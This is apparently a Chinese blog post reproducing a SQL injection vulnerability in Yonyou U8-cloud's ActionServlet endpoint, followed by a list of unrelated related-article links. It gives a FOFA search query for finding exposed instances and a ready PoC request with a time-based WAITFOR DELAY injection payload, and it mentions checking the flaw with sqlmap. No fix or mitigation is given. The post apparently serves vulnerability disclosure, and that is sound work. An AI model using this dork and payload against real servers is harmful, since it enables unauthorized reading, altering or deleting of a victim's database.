当前位置: 首页 > news >正文

【漏洞复现】用友 U8-cloud ActionServlet sql注入漏洞

news 2024/11/20 13:36:28

产品介绍

用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

漏洞描述

用友 U8-cloud ActionServlet 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。

漏洞环境 

FOFA:

app="用友-U8-Cloud"

 

漏洞复现

PoC

/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryFrameAction&method=doRefresh&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27-

sqlmap验证

 

 

 


http://www.mrgr.cn/news/27592.html

相关文章:

  • WPF中MVVM工具包 CommunityToolkit.Mvvm
  • 大模型基础BERT——Transformers的双向编码器表示
  • Springboot校园失物招领平台
  • OSError: [Errno 22] Invalid argument: ‘D:\\Desktop\\S\\SMTRY2\r.txt‘
  • 生成式GPT商品推荐:精准满足用户需求
  • Docker部署Kafka SASL_SSL认证,并集成到Spring Boot
  • lvs-dr模式实验详解
  • python注释知识点及用法讲解
  • 结构体指针
  • 计算机专业毕业设计选题指南:避开这些坑,让你轻松毕业-附选题推荐(精选题目汇总大全)
  • 【leetcode】树形结构习题
  • 小阿轩yx-案例:Zabbix监控kubernetes云原生环境
  • 安全区域边界等保测评
  • 51单片机-系列-单片机基础知识入门流水灯
  • 1.使用 VSCode 过程中的英语积累 - File 菜单(每一次重点积累 5 个单词)
  • 6芯7芯可旋转电连接器航空插头
  • [进阶]面向对象之 包 final
  • redis windows安装包下载路径
  • Python实用的27个实例,涵盖从基础到进阶的所有领域!
  • 字典转换(根据字典转换、根据id转换)
  • 为什么黄酒不能成为主流?
  • Leetcode 验证回文串
  • AUTOSAR_EXP_ARAComAPI的5章笔记(6)
  • 【网络安全 | Java代码审计】JreCms代码审计
  • 【网络通信基础与实践第三讲】传输层协议概述包括UDP协议和TCP协议
  • PCIe进阶之TL:First/Last DW Byte Enables Rules Traffic Class Field